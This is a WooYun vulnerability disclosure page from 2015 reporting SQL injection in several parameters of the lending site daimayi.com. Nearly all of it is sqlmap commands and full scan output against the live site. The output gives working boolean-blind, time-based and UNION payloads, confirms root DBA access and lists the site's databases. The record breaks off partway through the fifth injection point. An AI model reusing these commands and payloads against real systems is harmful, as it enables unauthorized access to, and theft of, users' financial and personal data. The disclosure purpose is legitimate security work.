当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152525

漏洞标题:贷蚂蚁主站多处SQL延时注入漏洞(DBA权限)

相关厂商:daimayi.com

漏洞作者: 路人甲

提交时间:2015-11-09 00:05

修复时间:2015-11-21 20:58

公开时间:2015-11-21 20:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

找了很久,测试了一晚上,白天没法测试,晚上继续,搜索了,这些也没有提交过吧!~~~多个参数存在注入点!~~~这么多难道不能大厂商?~~~

详细说明:

注入点一
地址:

sqlmap.py -u "http://daimayi.com/index.php/Loan/index/it_id/2*" --threads 10 --dbms "MySQL"


it_id后面的数字存在注入
sqlmap测试

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[22:20:35] [INFO] testing connection to the target URL
[22:20:40] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[22:20:46] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[22:20:48] [INFO] testing if URI parameter '#1*' is dynamic
[22:20:56] [WARNING] URI parameter '#1*' does not appear dynamic
[22:21:01] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[22:21:01] [INFO] testing for SQL injection on URI parameter '#1*'
[22:21:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:21:05] [WARNING] reflective value(s) found and filtering out
[22:21:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[22:22:32] [INFO] testing 'MySQL inline queries'
[22:22:37] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:22:37] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:22:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:23:49] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[22:23:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:23:49] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[22:24:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:24:47] [INFO] checking if the injection point on URI parameter '#1*' is a fa
lse positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 83 HTTP(s) requ
ests:
---
Place: URI
Parameter: #1*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/2 AND SLEEP(5)
---
[22:26:53] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


添加--level 5 --risk 3进行测试

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q] y
[16:14:21] [INFO] testing connection to the target URL
[16:14:25] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[16:14:30] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[16:14:32] [INFO] testing if URI parameter '#1*' is dynamic
[16:14:36] [WARNING] URI parameter '#1*' does not appear dynamic
[16:14:37] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[16:14:37] [INFO] testing for SQL injection on URI parameter '#1*'
[16:14:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:14:39] [WARNING] reflective value(s) found and filtering out
[16:17:32] [INFO] heuristics detected web page charset 'ascii'
[16:18:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[16:20:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[16:23:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[16:23:50] [INFO] URI parameter '#1*' seems to be 'OR boolean-based blind - WHER
E or HAVING clause' injectable
[16:23:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[16:23:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[16:23:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[16:23:57] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[16:24:01] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[16:24:06] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[16:24:08] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[16:24:09] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[16:24:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[16:24:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[16:24:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[16:24:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[16:24:14] [INFO] testing 'MySQL inline queries'
[16:24:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:24:14] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[16:24:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[16:24:17] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:24:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[16:24:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[16:24:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - co
mment)'
[16:24:31] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[16:25:31] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 OR time-based
blind' injectable
[16:25:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:25:31] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[16:25:59] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[16:26:26] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[16:26:50] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[16:27:14] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[16:27:38] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[16:28:02] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[16:28:27] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[16:28:51] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[16:29:15] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
'
[16:29:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:30:07] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns
'
[16:30:33] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[16:30:57] [INFO] testing 'Generic UNION query (random number) - 22 to 40 column
s'
[16:31:21] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[16:31:46] [INFO] testing 'Generic UNION query (random number) - 42 to 60 column
s'
[16:32:12] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[16:32:36] [INFO] testing 'Generic UNION query (random number) - 62 to 80 column
s'
[16:33:00] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[16:33:25] [INFO] testing 'Generic UNION query (random number) - 82 to 100 colum
ns'
[16:33:50] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 789 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/-2701) OR (6372=63
72) AND (5532=5532
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/-1877) OR 7209=SLE
EP(5) AND (7083=7083
---
[16:37:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


sqlmap.py -u "http://daimayi.com/index.php/Loan/index/it_id/2*" --threads 1 --dbms "MySQL" --level 5 --risk 3 --time-sec 10
--current-user --current-db --is-dba

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[16:40:16] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/-2701) OR (6372=63
72) AND (5532=5532
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/-1877) OR 7209=SLE
EP(10) AND (7083=7083
---
[16:40:21] [INFO] testing MySQL
[16:40:25] [WARNING] reflective value(s) found and filtering out
[16:40:29] [INFO] confirming MySQL
[16:40:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:40:41] [INFO] fetching current user
[16:40:41] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:40:41] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[16:48:27] [INFO] fetching current database
[16:48:27] [INFO] retrieved: huomayi
current database: 'huomayi'
[16:52:35] [INFO] testing if current user is DBA
[16:52:35] [INFO] fetching current user
current user is DBA: True


available databases [8]:
[*] daimayi
[*] huomayi
[*] information_schema
[*] mayishequ
[*] mysql
[*] myxd
[*] performance_schema
[*] test


0.jpg


1.jpg


2.jpg


第二处注入点:
sqlmap.py -u "http://daimayi.com/index.php/Loan/index/rm_id/2*" --threads 1 --dbms "MySQL" --level 5 --risk 3 --time-sec 10 --current-user --current-db --is-dba

[*] starting at 20:28:18
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[20:28:19] [INFO] testing connection to the target URL
[20:28:24] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[20:28:29] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[20:28:31] [INFO] testing if URI parameter '#1*' is dynamic
[20:28:36] [WARNING] URI parameter '#1*' does not appear dynamic
[20:28:37] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[20:28:37] [INFO] testing for SQL injection on URI parameter '#1*'
[20:28:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:28:38] [WARNING] reflective value(s) found and filtering out
[20:31:08] [INFO] heuristics detected web page charset 'ascii'
[20:31:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[20:34:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[20:37:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[20:37:43] [INFO] URI parameter '#1*' seems to be 'OR boolean-based blind - WHER
E or HAVING clause' injectable
[20:37:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[20:37:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[20:37:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[20:37:50] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[20:37:54] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[20:37:59] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[20:38:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[20:38:02] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[20:38:06] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[20:38:07] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:38:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[20:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[20:38:14] [INFO] testing 'MySQL inline queries'
[20:38:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:38:19] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[20:38:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:38:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:38:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[20:38:27] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:38:49] [INFO] URI parameter '#1*' seems to be 'MySQL < 5.0.12 AND time-based
blind (heavy query)' injectable
[20:38:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:38:49] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[20:39:17] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[20:39:46] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[20:40:12] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[20:40:37] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[20:41:01] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[20:41:29] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[20:41:54] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[20:42:18] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[20:42:43] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
'
[20:43:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:43:34] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns
'
[20:44:01] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[20:44:25] [INFO] testing 'Generic UNION query (random number) - 22 to 40 column
s'
[20:44:49] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[20:45:15] [INFO] testing 'Generic UNION query (random number) - 42 to 60 column
s'
[20:45:40] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[20:46:04] [INFO] testing 'Generic UNION query (random number) - 62 to 80 column
s'
[20:46:29] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[20:46:54] [INFO] testing 'Generic UNION query (random number) - 82 to 100 colum
ns'
[20:47:18] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 797 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Loan/index/rm_id/-6319 OR (8722=872
2)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: http://daimayi.com:80/index.php/Loan/index/rm_id/2 AND 8936=BENCHMA
RK(10000000,MD5(0x6c66665a))
---
[20:47:22] [INFO] testing MySQL
[20:47:28] [INFO] confirming MySQL
[20:47:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[20:47:39] [INFO] fetching current user
[20:47:39] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[20:47:39] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[20:57:00] [INFO] fetching current database
[20:57:00] [INFO] retrieved: huomayi
current database: 'huomayi'
[21:01:41] [INFO] testing if current user is DBA
[21:01:41] [INFO] fetching current user
current user is DBA: True


3.jpg


注入点三:
sqlmap.py -u "http://daimayi.com/index.php/Public/exchange_city/code/120200 *" --threads 1 --dbms "MySQL" --level 5 --risk 3 --time-sec 10

[*] starting at 01:07:03
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[01:07:05] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://daimayi.com:80/index.php/Index/index'. Do y
ou want to follow? [Y/n]
[01:07:13] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[01:07:20] [WARNING] URI parameter '#1*' does not appear dynamic
[01:07:26] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[01:07:26] [INFO] testing for SQL injection on URI parameter '#1*'
[01:07:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:16:34] [INFO] heuristics detected web page charset 'ascii'
[01:21:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[01:35:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[01:50:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[01:57:54] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
L comment)'
[02:04:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene
ric comment)'
[02:10:12] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY o
r GROUP BY clause (RLIKE)'
[02:26:03] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig
inal value)'
[02:26:03] [WARNING] reflective value(s) found and filtering out
[02:26:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET - original value)'
[02:26:24] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
original value)'
[02:26:45] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
nt - original value)'
[02:27:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[02:27:24] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
original value)'
[02:27:41] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses'
[02:27:42] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses (original value)'
[02:27:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[02:28:20] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[02:28:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:32:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[02:37:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[02:41:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[02:45:40] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[02:48:37] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[02:52:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[02:57:27] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[03:00:17] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[03:02:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[03:02:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[03:03:03] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[03:03:09] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clau
ses'
[03:03:19] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau
ses (EXTRACTVALUE)'
[03:03:33] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau
ses (UPDATEXML)'
[03:03:45] [INFO] testing 'MySQL inline queries'
[03:03:51] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:03:51] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[03:08:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:12:17] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:14:07] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[03:14:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:14:07] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:16:41] [INFO] target URL appears to be UNION injectable with 6 columns
[03:17:26] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 col
umns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 1254 HTTP(s) re
quests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://daimayi.com:80/index.php/Public/exchange_city/code/-1362') U
NION ALL SELECT NULL,NULL,CONCAT(0x716f7a6971,0x63557866796e487a6c4b,0x717472707
1),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Public/exchange_city/code/120200')
AND SLEEP(10) AND ('huGr'='huGr
---
[03:26:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


但是获取不到东西,只能作罢!~~~

4.jpg


注入点四:
http://daimayi.com/index.php/Register/examimgUserName?user_name=test
user_name存在注入

[*] starting at 03:33:26
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[03:33:28] [INFO] testing connection to the target URL
[03:33:29] [INFO] heuristics detected web page charset 'ascii'
[03:33:29] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[03:33:31] [INFO] target URL is stable
[03:33:31] [INFO] testing if URI parameter '#1*' is dynamic
[03:33:32] [INFO] confirming that URI parameter '#1*' is dynamic
[03:33:33] [WARNING] URI parameter '#1*' does not appear dynamic
[03:33:35] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[03:33:35] [INFO] testing for SQL injection on URI parameter '#1*'
[03:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:33:58] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHE
RE or HAVING clause' injectable
[03:33:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[03:33:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[03:34:00] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[03:34:01] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[03:34:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[03:34:05] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[03:34:06] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[03:34:08] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[03:34:09] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[03:34:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[03:34:10] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[03:34:10] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[03:34:10] [INFO] testing 'MySQL inline queries'
[03:34:10] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:34:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:34:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:34:35] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[03:34:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:34:35] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:34:37] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[03:34:48] [INFO] target URL appears to have 46 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[03:38:58] [INFO] testing 'MySQL UNION query (36) - 22 to 40 columns'
[03:39:21] [INFO] testing 'MySQL UNION query (36) - 42 to 60 columns'
[03:39:44] [INFO] target URL appears to be UNION injectable with 46 columns
[03:41:37] [INFO] testing 'MySQL UNION query (36) - 62 to 80 columns'
[03:42:00] [INFO] testing 'MySQL UNION query (36) - 82 to 100 columns'
[03:42:24] [INFO] testing 'Generic UNION query (36) - 1 to 20 columns'
[03:44:16] [INFO] testing 'Generic UNION query (36) - 22 to 40 columns'
[03:44:39] [INFO] testing 'Generic UNION query (36) - 42 to 60 columns'
[03:46:56] [INFO] testing 'Generic UNION query (36) - 62 to 80 columns'
[03:47:19] [INFO] testing 'Generic UNION query (36) - 82 to 100 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 656 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Register/examimgUserName?user_name=
test') AND 6888=6888 AND ('qZvD'='qZvD
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Register/examimgUserName?user_name=
test') AND SLEEP(10) AND ('TnMk'='TnMk
---
[03:50:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.11


5.jpg


6.jpg


7.jpg


注入点五:
sqlmap.py -u "http://daimayi.com/index.php/Find_pwd/check_user_name?user_name=test*" --threads 10 --dbms "MySQL" --
level 5 --risk 3 --time-sec 10
依旧是user_name存在注入

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[04:12:55] [INFO] testing connection to the target URL
[04:12:56] [INFO] heuristics detected web page charset 'ascii'
[04:12:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[04:12:58] [INFO] target URL is stable
[04:12:58] [INFO] testing if URI parameter '#1*' is dynamic
[04:12:59] [INFO] confirming that URI parameter '#1*' is dynamic
[04:13:01] [WARNING] URI parameter '#1*' does not appear dynamic
[04:13:02] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[04:13:02] [INFO] testing for SQL injection on URI parameter '#1*'
[04:13:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:13:25] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHE
RE or HAVING clause' injectable
[04:13:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[04:13:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[04:13:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[04:13:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[04:13:30] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[04:13:32] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[04:13:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[04:13:35] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[04:13:36] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[04:13:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:13:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[04:13:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[04:13:37] [INFO] testing 'MySQL inline queries'
[04:13:37] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:13:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[04:13:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:14:02] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[04:14:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[04:14:02] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
